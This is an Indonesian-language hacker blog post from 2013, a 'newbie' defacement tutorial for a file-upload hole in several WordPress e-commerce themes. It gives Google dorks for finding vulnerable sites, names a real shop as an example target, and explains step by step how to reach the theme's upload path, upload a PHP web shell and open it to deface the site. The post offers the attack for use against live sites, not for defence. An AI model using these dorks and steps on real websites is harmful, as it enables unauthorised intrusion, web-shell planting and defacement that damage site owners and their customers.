Senin, 27 Mei 2013

Wordpress Themes Upload Vulnerabily

Selamat malaaaaam sobat IDCA =))

lama banget ane k posting :D *lebay -_-
Langsung saja yaaa, ane mau share trik deface lagi, tapi trik ini sebenernya udah jadul sih tapi bagi yang belum tau silahkan baca tutorial berikut ini :D

Dork :


  • inurl:/wp-content/themes/KidzStore
  • inurl:/wp-content/themes/WpStore
  • inurl:/wp-content/themes/eCommerce
  • inurl:/wp-content/themes/eShop
  • inurl:/wp-content/themes/emporium
  • inurl:/?=cart intext:"Sorry, the Cart is empty. Select Products via Continue Shopping."
untuk dork bisa kalian kembangin sendiri okey =))

[+] LANGKAH - LANGKAH [+]

1. Copy dan paste kan ke google salah satu dork diatas


2. Lalu pilih salah satu, disini saya mengambil contoh http://www.laptopreplacementscreen.com/



3. Setelah itu kalian buka sourcenya caranya tekan CTRL+U , Setelah itu cari sebuah link di source tersebut contoh punya saya "https://www.laptopreplacementscreen.com/wp-content/themes/WPStore/style.css"




5. Setelah itu kalian ubah menjadi "wp-content/themes/[path]/upload/
  • www.laptopreplacementscreen.com/wp-content/themes/WPStore/upload




6. Jika uploadnya lama, berati tandanya ngak bisa, tapi kalo cepat berati berhasil terupload (*tergantung size file yang di upload sih) jika sudah cara memanggilnya seperti ini :
  • localhost/wp-content/uploads/products_img/SHELL.php
maka hasilnya akan seperti ini :


nah tinggal tebas tuh :D

oke sekian tutorial newbie dari saya, jika kurang jelas silahkan tanyakan di komentar =))

Content Creator : Bimo Septiawan